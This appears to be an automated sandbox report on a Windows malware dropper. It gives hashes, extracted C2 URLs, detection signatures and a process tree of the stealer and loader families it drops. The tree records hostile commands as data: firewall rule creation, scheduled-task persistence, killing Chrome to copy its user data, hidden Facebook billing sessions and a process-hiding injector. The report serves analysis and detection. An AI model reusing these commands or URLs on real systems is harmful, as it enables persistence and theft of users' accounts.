fabookie | 67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33

Resubmissions

04/10/2024, 18:01

241004-wl132axhpm 10

22/04/2024, 20:52

27/02/2024, 22:40

03/01/2024, 09:53

29/12/2023, 23:48

Analysis

max time kernel
1s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29/12/2023, 23:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

078192e792b12a8d9980f364e110155c.exe
Size

8.7MB
MD5

078192e792b12a8d9980f364e110155c
SHA1

89596e27530eeccd6ad9644aa045e8e0499301a1
SHA256

67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
SHA512

72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
SSDEEP

196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J

Malware Config

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

ffdroider

http://186.2.171.3

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00080000000231e0-24.dat	family_fabookie
behavioral2/files/0x00080000000231e0-29.dat	family_fabookie

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider payload 3 IoCs

resource	yara_rule
behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider
behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider
behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp	family_ffdroider

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

resource	yara_rule
behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp	family_glupteba
behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp	family_glupteba
behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba
behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	4968	rUNdlL32.eXe	103

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V1 payload 4 IoCs

resource	yara_rule
behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00060000000231e7-42.dat	family_socelars
behavioral2/files/0x00060000000231e7-50.dat	family_socelars

Nirsoft 3 IoCs

resource	yara_rule
behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
5700	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	078192e792b12a8d9980f364e110155c.exe

Executes dropped EXE 2 IoCs

pid	Process
3068	Files.exe
1196	KRSetp.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp	upx

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect
behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
11	ipinfo.io
13	ipinfo.io
21	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1608	3372	WerFault.exe	110
5800	2340	WerFault.exe	96

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3228	schtasks.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	87	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
3480	taskkill.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 3068	712	078192e792b12a8d9980f364e110155c.exe	91
PID 712 wrote to memory of 1196	712	078192e792b12a8d9980f364e110155c.exe	94
PID 712 wrote to memory of 1196	712	078192e792b12a8d9980f364e110155c.exe	94

C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe
"C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:712
- C:\Users\Admin\AppData\Local\Temp\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3068
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:3348
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5216
- C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
  2⤵
  - Executes dropped EXE
  PID:1196
- C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
  2⤵
  PID:2900
- C:\Users\Admin\AppData\Local\Temp\pub2.exe
  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 368
    3⤵
    - Program crash
    PID:5800
- C:\Users\Admin\AppData\Local\Temp\Complete.exe
  "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
  2⤵
  PID:1580
- C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
  "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
  2⤵
  PID:2432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff959204718
    3⤵
    PID:3400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
    3⤵
    PID:2112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
    3⤵
    PID:3060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
    3⤵
    PID:3864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:3256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
    3⤵
    PID:2036
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
    3⤵
    PID:5516
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
    3⤵
    PID:5500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
    3⤵
    PID:5596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
    3⤵
    PID:5588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
    3⤵
    PID:6128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
    3⤵
    PID:6120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:2
    3⤵
    PID:4816
- C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
  "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
  2⤵
  PID:1648
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6644
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6636
- - C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
    3⤵
    PID:6628
- C:\Users\Admin\AppData\Local\Temp\Info.exe
  "C:\Users\Admin\AppData\Local\Temp\Info.exe"
  2⤵
  PID:452
- - C:\Users\Admin\AppData\Local\Temp\Info.exe
    "C:\Users\Admin\AppData\Local\Temp\Info.exe"
    3⤵
    PID:5320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5916
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe /94-94
      4⤵
      PID:1376
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:2824
- C:\Users\Admin\AppData\Local\Temp\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
  2⤵
  PID:1164
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:5168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      PID:3480
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
    3⤵
    PID:1324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
    3⤵
    PID:5864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:5992
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:1764
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:2796
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:2132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
      4⤵
      PID:4784
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:1412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:5952
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
      4⤵
      PID:6352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:6096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
      4⤵
      PID:6052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
      4⤵
      PID:6856

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
1⤵
PID:1116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1548

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
PID:3372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 604
  2⤵
  - Program crash
  PID:1608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 3372
1⤵
PID:2992

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 2340
1⤵
PID:5768

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b9778
1⤵
PID:5892

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
4bc8a3540a546cfe044e0ed1a0a22a95

SHA1
5387f78f1816dee5393bfca1fffe49cede5f59c1

SHA256
f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

SHA512
e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe

Filesize
975KB

MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
